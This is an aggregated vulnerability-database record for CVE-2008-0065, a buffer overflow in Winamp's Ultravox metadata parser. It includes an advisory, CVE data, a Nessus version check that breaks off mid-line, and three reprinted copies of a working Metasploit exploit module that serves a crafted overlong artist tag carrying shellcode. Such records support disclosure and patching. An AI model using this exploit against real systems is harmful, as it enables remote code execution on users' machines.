ID SAINT:851664FB8EBE47E57F665799E4455AC8Type saintReporter SAINT CorporationModified 2008-02-04T00:00:00
Description
Added: 02/04/2008CVE-2008-0065 27344 41707
Background
Winamp is a media player for Windows.
Problem
A buffer overflow vulnerability in the **in_mp3.dll** library when parsing Ultravox streaming metadata allows command execution when a user opens a stream containing a long, specially crafted **<artist>** tag value.
Resolution
Upgrade to Winamp 5.52 or higher.
References
<http://secunia.com/secunia_research/2008-2/advisory/>
Limitations
Exploit works on Winamp 5.21 and requires a user to open the exploit stream in Winamp.
Platforms
Windows
{"id": "SAINT:851664FB8EBE47E57F665799E4455AC8", "bulletinFamily": "exploit", "title": "Winamp Ultravox streaming metadata artist tag buffer overflow", "description": "Added: 02/04/2008 \nCVE: [CVE-2008-0065](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0065>) \nBID: [27344](<http://www.securityfocus.com/bid/27344>) \nOSVDB: [41707](<http://www.osvdb.org/41707>) \n\n\n### Background\n\n[Winamp](<http://www.winamp.com>) is a media player for Windows. \n\n### Problem\n\nA buffer overflow vulnerability in the `**in_mp3.dll**` library when parsing Ultravox streaming metadata allows command execution when a user opens a stream containing a long, specially crafted `**<artist>**` tag value. \n\n### Resolution\n\n[Upgrade](<http://www.winamp.com/player>) to Winamp 5.52 or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2008-2/advisory/> \n\n\n### Limitations\n\nExploit works on Winamp 5.21 and requires a user to open the exploit stream in Winamp. \n\n### Platforms\n\nWindows \n \n\n", "published": "2008-02-04T00:00:00", "modified": "2008-02-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/winamp_ultravox_artist", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2008-0065"], "type": "saint", "lastseen": "2019-06-04T23:19:32", "edition": 4, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0065"]}, {"type": "nessus", "idList": ["WINAMP_552.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/WINAMP_ULTRAVOX"]}, {"type": "saint", "idList": ["SAINT:23BD60E2EA920985F1D39473D7170025", "SAINT:D414B1432F9630D7C8517F0AABC165AA"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82952"]}, {"type": "exploitdb", "idList": ["EDB-ID:16611"]}, {"type": "seebug", "idList": ["SSV:2840"]}], "modified": "2019-06-04T23:19:32", "rev": 2}, "score": {"value": 9.2, "vector": "NONE", "modified": "2019-06-04T23:19:32", "rev": 2}, "vulnersScore": 9.2}, "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-04-21T20:41:31", "description": "Multiple stack-based buffer overflows in in_mp3.dll in Winamp 5.21, 5.5, and 5.51 allow remote attackers to execute arbitrary code via a long (1) artist or (2) name tag in Ultravox streaming metadata, related to construction of stream titles.", "edition": 5, "cvss3": {}, "published": "2008-01-22T20:00:00", "title": "CVE-2008-0065", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0065"], "modified": "2017-08-08T01:29:00", "cpe": ["cpe:/a:winamp:nullsoft_winamp:5.51", "cpe:/a:winamp:nullsoft_winamp:5.21", "cpe:/a:winamp:nullsoft_winamp:5.5"], "id": "CVE-2008-0065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0065", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:winamp:nullsoft_winamp:5.21:*:*:*:*:*:*:*", "cpe:2.3:a:winamp:nullsoft_winamp:5.51:*:*:*:*:*:*:*", "cpe:2.3:a:winamp:nullsoft_winamp:5.5:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "description": "Added: 02/04/2008 \nCVE: [CVE-2008-0065](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0065>) \nBID: [27344](<http://www.securityfocus.com/bid/27344>) \nOSVDB: [41707](<http://www.osvdb.org/41707>) \n\n\n### Background\n\n[Winamp](<http://www.winamp.com>) is a media player for Windows. \n\n### Problem\n\nA buffer overflow vulnerability in the `**in_mp3.dll**` library when parsing Ultravox streaming metadata allows command execution when a user opens a stream containing a long, specially crafted `**<artist>**` tag value. \n\n### Resolution\n\n[Upgrade](<http://www.winamp.com/player>) to Winamp 5.52 or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2008-2/advisory/> \n\n\n### Limitations\n\nExploit works on Winamp 5.21 and requires a user to open the exploit stream in Winamp. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2008-02-04T00:00:00", "published": "2008-02-04T00:00:00", "id": "SAINT:23BD60E2EA920985F1D39473D7170025", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/winamp_ultravox_artist", "type": "saint", "title": "Winamp Ultravox streaming metadata artist tag buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "edition": 2, "description": "Added: 02/04/2008 \nCVE: [CVE-2008-0065](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0065>) \nBID: [27344](<http://www.securityfocus.com/bid/27344>) \nOSVDB: [41707](<http://www.osvdb.org/41707>) \n\n\n### Background\n\n[Winamp](<http://www.winamp.com>) is a media player for Windows. \n\n### Problem\n\nA buffer overflow vulnerability in the `**in_mp3.dll**` library when parsing Ultravox streaming metadata allows command execution when a user opens a stream containing a long, specially crafted `**<artist>**` tag value. \n\n### Resolution\n\n[Upgrade](<http://www.winamp.com/player>) to Winamp 5.52 or higher. \n\n### References\n\n<http://secunia.com/secunia_research/2008-2/advisory/> \n\n\n### Limitations\n\nExploit works on Winamp 5.21 and requires a user to open the exploit stream in Winamp. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-02-04T00:00:00", "published": "2008-02-04T00:00:00", "id": "SAINT:D414B1432F9630D7C8517F0AABC165AA", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/winamp_ultravox_artist", "type": "saint", "title": "Winamp Ultravox streaming metadata artist tag buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:04:45", "description": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow. CVE-2008-0065. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Winamp Ultravox Streaming Metadata in_mp3.dll - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16611", "href": "https://www.exploit-db.com/exploits/16611/", "sourceData": "##\r\n# $Id: winamp_ultravox.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::TcpServer\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Winamp 5.24. By\r\n\t\t\t\tsending an overly long artist tag, a remote attacker may\r\n\t\t\t\tbe able to execute arbitrary code. This vulnerability can be\r\n\t\t\t\texploited from the browser or the winamp client itself.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-0065' ],\r\n\t\t\t\t\t[ 'OSVDB', '41707' ],\r\n\t\t\t\t\t[ 'BID', '27344' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 700,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 18 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptPort.new('SRVPORT', [ true, \"The HTTP daemon port to listen on.\", 8080 ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef on_client_connect(client)\r\n\t\treturn if ((p = regenerate_payload(client)) == nil)\r\n\r\n\t\tres = client.get_once\r\n\r\n\t\tcontent = \"\\x00\\x01\\x00\\x01\\x00\\x01\" + \"<metadata><song><artist>\"\r\n\t\tcontent << make_nops(3828 - payload.encoded.length) + payload.encoded\r\n\t\tcontent << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\r\n\t\tcontent << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)\r\n\t\tcontent << \"</artist></song></metadata>\"\r\n\r\n\t\tsploit = \"\\x5a\\x00\\x39\\x01\" + [content.length].pack('n')\r\n\t\tsploit << content + \"\\x00\"\r\n\r\n\t\t# randomize some stuff.\r\n\t\tnum = rand(65535).to_s\r\n\r\n\t\theader = \"HTTP/1.0 200 OK\\r\\n\"\r\n\t\theader << \"Server: Ultravox 3.0\\r\\n\"\r\n\t\theader << \"Content-Type: misc/ultravox\\r\\n\"\r\n\t\theader << \"Ultravox-SID: #{num}\\r\\n\"\r\n\t\theader << \"Ultravox-Avg-Bitrate: #{num}\\r\\n\"\r\n\t\theader << \"Ultravox-Max-Bitrate: #{num}\\r\\n\"\r\n\t\theader << \"Ultravox-Max-Msg: #{num}\\r\\n\"\r\n\t\theader << \"Ultravox-Stream-Info: Ultravox;Live Stream\\r\\n\"\r\n\t\theader << \"Ultravox-Msg-Que: #{num}\\r\\n\"\r\n\t\theader << \"Ultravox-Max-Fragments: 1\\r\\n\\r\\n\"\r\n\t\theader << sploit\r\n\r\n\t\tprint_status(\"Sending #{header.length} bytes to #{client.peerhost}:#{client.peerport}...\")\r\n\r\n\t\tclient.put(header)\r\n\t\thandler(client)\r\n\r\n\t\tservice.close_client(client)\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\nHTTP/1.0 200\r\n.Server: Ultravo\r\nx 3.0..Content-T\r\nype: misc/ultrav\r\nox..Ultravox-SID\r\n: 22221..Ultravo\r\nx-Avg-Bitrate: 6\r\n4000..Ultravox-M\r\nax-Bitrate: 9600\r\n0..Ultravox-Max-\r\nMsg: 16000..Ultr\r\navox-Stream-Info\r\n: Ultravox;Live\r\nStream..Ultravox\r\n-Msg-Que: 39..Ul\r\ntravox-Max-Fragm\r\n\r\nZ.9..,......<met\r\nadata><length>0<\r\n/length><soon>Mo\r\nre on\r\n</soon><song><na\r\nme>The Night\r\nghts In\r\ntin</name><album\r\n>Days Of\r\nPassed</album><a\r\nrtist>The Moody\r\nBlues</artist><a\r\nlbum_art>xm/stat\r\nion_logo_WBCRHT.\r\njpg</album_art><\r\nalbum_art_200>xm\r\n/station_logo_WB\r\nCRHT_200.jpg</al\r\nbum_art_200><ser\r\nial>-1</serial><\r\nsong_id>-1</song\r\n_id><amg_song_id\r\n>-1</amg_song_id\r\n><amg_artist_id>\r\n-1</amg_artist_i\r\nd><amg_album_id>\r\n-1</amg_album_id\r\n><itunes_song_id\r\n>-1</itunes_song\r\n_id><itunes_arti\r\nst_id>-1</itunes\r\n_artist_id><itun\r\nes_album_id>-1</\r\nitunes_album_id>\r\n</song></metadat\r\na>.Z.......\\./!.\r\n!.UP.......B...&\r\nZ....D)ydB.,.vy/\r\n=end\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16611/"}], "metasploit": [{"lastseen": "2020-10-06T04:40:48", "description": "This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the Winamp client itself.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/WINAMP_ULTRAVOX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.\n },\n 'Author' => 'MC',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-0065' ],\n [ 'OSVDB', '41707' ],\n [ 'BID', '27344' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 700,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\",\n 'StackAdjustment' => -3500,\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 18 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The HTTP daemon port to listen on.\", 8080 ])\n ])\n end\n\n def on_client_connect(client)\n return if ((p = regenerate_payload(client)) == nil)\n\n res = client.get_once\n\n content = \"\\x00\\x01\\x00\\x01\\x00\\x01\" + \"<metadata><song><artist>\"\n content << make_nops(3828 - payload.encoded.length) + payload.encoded\n content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')\n content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)\n content << \"</artist></song></metadata>\"\n\n sploit = \"\\x5a\\x00\\x39\\x01\" + [content.length].pack('n')\n sploit << content + \"\\x00\"\n\n # randomize some stuff.\n num = rand(65535).to_s\n\n header = \"HTTP/1.0 200 OK\\r\\n\"\n header << \"Server: Ultravox 3.0\\r\\n\"\n header << \"Content-Type: misc/ultravox\\r\\n\"\n header << \"Ultravox-SID: #{num}\\r\\n\"\n header << \"Ultravox-Avg-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Bitrate: #{num}\\r\\n\"\n header << \"Ultravox-Max-Msg: #{num}\\r\\n\"\n header << \"Ultravox-Stream-Info: Ultravox;Live Stream\\r\\n\"\n header << \"Ultravox-Msg-Que: #{num}\\r\\n\"\n header << \"Ultravox-Max-Fragments: 1\\r\\n\\r\\n\"\n header << sploit\n\n print_status(\"Sending #{header.length} bytes\")\n\n client.put(header)\n handler(client)\n\n service.close_client(client)\n end\nend\n\n\n=begin\nHTTP/1.0 200\n.Server: Ultravo\nx 3.0..Content-T\nype: misc/ultrav\nox..Ultravox-SID\n: 22221..Ultravo\nx-Avg-Bitrate: 6\n4000..Ultravox-M\nax-Bitrate: 9600\n0..Ultravox-Max-\nMsg: 16000..Ultr\navox-Stream-Info\n: Ultravox;Live\nStream..Ultravox\n-Msg-Que: 39..Ul\ntravox-Max-Fragm\n\nZ.9..,......<met\nadata><length>0<\n/length><soon>Mo\nre on\n</soon><song><na\nme>The Night\nghts In\ntin</name><album\n>Days Of\nPassed</album><a\nrtist>The Moody\nBlues</artist><a\nlbum_art>xm/stat\nion_logo_WBCRHT.\njpg</album_art><\nalbum_art_200>xm\n/station_logo_WB\nCRHT_200.jpg</al\nbum_art_200><ser\nial>-1</serial><\nsong_id>-1</song\n_id><amg_song_id\n>-1</amg_song_id\n><amg_artist_id>\n-1</amg_artist_i\nd><amg_album_id>\n-1</amg_album_id\n><itunes_song_id\n>-1</itunes_song\n_id><itunes_arti\nst_id>-1</itunes\n_artist_id><itun\nes_album_id>-1</\nitunes_album_id>\n</song></metadat\na>.Z.......\\./!.\n!.UP.......B...&\nZ....D)ydB.,.vy/\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/winamp_ultravox.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:01", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82952", "href": "https://packetstormsecurity.com/files/82952/Winamp-Ultravox-Streaming-Metadata-in_mp3.dll-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::TcpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Winamp 5.24. By \nsending an overly long artist tag, a remote attacker may \nbe able to execute arbitrary code. This vulnerability can be \nexploited from the browser or the winamp client itself. \n}, \n'Author' => 'MC', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2008-0065' ], \n[ 'OSVDB', '41707' ], \n[ 'BID', '27344' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 700, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\", \n'StackAdjustment' => -3500, \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 18 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The HTTP daemon port to listen on.\", 8080 ]) \n], self.class) \nend \n \ndef on_client_connect(client) \nreturn if ((p = regenerate_payload(client)) == nil) \n \nres = client.get_once \n \ncontent = \"\\x00\\x01\\x00\\x01\\x00\\x01\" + \"<metadata><song><artist>\" \ncontent << make_nops(3828 - payload.encoded.length) + payload.encoded \ncontent << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') \ncontent << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183) \ncontent << \"</artist></song></metadata>\" \n \nsploit = \"\\x5a\\x00\\x39\\x01\" + [content.length].pack('n') \nsploit << content + \"\\x00\" \n \n# randomize some stuff. \nnum = rand(65535).to_s \n \nheader = \"HTTP/1.0 200 OK\\r\\n\" \nheader << \"Server: Ultravox 3.0\\r\\n\" \nheader << \"Content-Type: misc/ultravox\\r\\n\" \nheader << \"Ultravox-SID: #{num}\\r\\n\" \nheader << \"Ultravox-Avg-Bitrate: #{num}\\r\\n\" \nheader << \"Ultravox-Max-Bitrate: #{num}\\r\\n\" \nheader << \"Ultravox-Max-Msg: #{num}\\r\\n\" \nheader << \"Ultravox-Stream-Info: Ultravox;Live Stream\\r\\n\" \nheader << \"Ultravox-Msg-Que: #{num}\\r\\n\" \nheader << \"Ultravox-Max-Fragments: 1\\r\\n\\r\\n\" \nheader << sploit \n \nprint_status(\"Sending #{header.length} bytes to #{client.peerhost}:#{client.peerport}...\") \n \nclient.put(header) \nhandler(client) \n \nservice.close_client(client) \nend \n \nend \n \n \n=begin \nHTTP/1.0 200 \n.Server: Ultravo \nx 3.0..Content-T \nype: misc/ultrav \nox..Ultravox-SID \n: 22221..Ultravo \nx-Avg-Bitrate: 6 \n4000..Ultravox-M \nax-Bitrate: 9600 \n0..Ultravox-Max- \nMsg: 16000..Ultr \navox-Stream-Info \n: Ultravox;Live \nStream..Ultravox \n-Msg-Que: 39..Ul \ntravox-Max-Fragm \n \nZ.9..,......<met \nadata><length>0< \n/length><soon>Mo \nre on \n</soon><song><na \nme>The Night \nghts In \ntin</name><album \n>Days Of \nPassed</album><a \nrtist>The Moody \nBlues</artist><a \nlbum_art>xm/stat \nion_logo_WBCRHT. \njpg</album_art>< \nalbum_art_200>xm \n/station_logo_WB \nCRHT_200.jpg</al \nbum_art_200><ser \nial>-1</serial>< \nsong_id>-1</song \n_id><amg_song_id \n>-1</amg_song_id \n><amg_artist_id> \n-1</amg_artist_i \nd><amg_album_id> \n-1</amg_album_id \n><itunes_song_id \n>-1</itunes_song \n_id><itunes_arti \nst_id>-1</itunes \n_artist_id><itun \nes_album_id>-1</ \nitunes_album_id> \n</song></metadat \na>.Z.......\\./!. \n!.UP.......B...& \nZ....D)ydB.,.vy/ \n=end \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82952/winamp_ultravox.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T21:52:32", "description": "BUGTRAQ ID: 27344\r\nCVE(CAN) ID: CVE-2008-0065\r\n\r\nWinamp\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u5a92\u4f53\u64ad\u653e\u5668\uff0c\u652f\u6301\u591a\u79cd\u6587\u4ef6\u683c\u5f0f\u3002\r\n\r\nWinamp\u5728\u5904\u7406\u7578\u5f62\u683c\u5f0f\u7684\u6570\u636e\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\nWinamp\u7684in_mp3.dll\u5e93\u5728\u89e3\u6790Ultravox\u6d41\u5143\u6570\u636e\u65f6\u6ca1\u6709\u6b63\u786e\u5730\u521b\u5efa\u6d41\u6807\u9898\u3002\u5982\u679c<metadata>\u90e8\u5206\u8bbe\u7f6e\u4e86\u8d85\u957f\u7684<artist>\u548c<name>\u6807\u7b7e\u503c\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u89e6\u53d1\u6808\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\n\n\nNullsoft Winamp 5.51\r\nNullsoft Winamp 5.5\r\nNullsoft Winamp 5.21\n Nullsoft\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.winamp.com/ target=_blank>http://www.winamp.com/</a>", "published": "2008-01-21T00:00:00", "type": "seebug", "title": "Winamp Ultravox\u6d41\u5143\u6570\u636e\u591a\u4e2a\u6808\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0065"], "modified": "2008-01-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2840", "id": "SSV:2840", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T07:45:48", "description": "The remote host is using Winamp, a popular media player for Windows. \n\nThe version of Winamp installed on the remote Windows host reportedly\ncontains two stack-based buffer overflows in 'in_mp3.dll' when parsing\nUltravox streaming metadata that can be triggered by overly-long\n'<artist>' and '<name>' tag values. If an attacker can trick a user\non the affected host into opening a specially crafted file, he could be\nable to leverage this issue to execute arbitrary code on the host\nsubject to the user's privileges.", "edition": 28, "published": "2008-01-18T00:00:00", "title": "Winamp < 5.52 Ultravox Streaming Metadata in_mp3.dll Multiple Tag Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0065"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:nullsoft:winamp"], "id": "WINAMP_552.NASL", "href": "https://www.tenable.com/plugins/nessus/29998", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29998);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2008-0065\");\n script_bugtraq_id(27344);\n script_xref(name:\"Secunia\", value:\"27865\");\n\n script_name(english:\"Winamp < 5.52 Ultravox Streaming Metadata in_mp3.dll Multiple Tag Overflow\");\n script_summary(english:\"Checks the version number of Winamp\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a multimedia application that is\naffected by multiple buffer overflow vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is using Winamp, a popular media player for Windows. \n\nThe version of Winamp installed on the remote Windows host reportedly\ncontains two stack-based buffer overflows in 'in_mp3.dll' when parsing\nUltravox streaming metadata that can be triggered by overly-long\n'<artist>' and '<name>' tag values. If an attacker can trick a user\non the affected host into opening a specially crafted file, he could be\nable to leverage this issue to execute arbitrary code on the host\nsubject to the user's privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2008-2/advisory/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.winamp.com/player/version-history\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.winamp.com/showthread.php?threadid=285024\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Winamp version 5.52 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/01/18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nullsoft:winamp\");\nscript_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"winamp_in_cdda_buffer_overflow.nasl\");\n script_require_keys(\"SMB/Winamp/Version\");\n exit(0);\n}\n\n# Check version of Winamp.\n\n#\n# nb: the KB item is based on GetFileVersion, which may differ\n# from what the client reports.\n\nversion = get_kb_item(\"SMB/Winamp/Version\");\nif (isnull(version)) exit(0);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nfix = split(\"5.5.2.1800\", sep:'.', 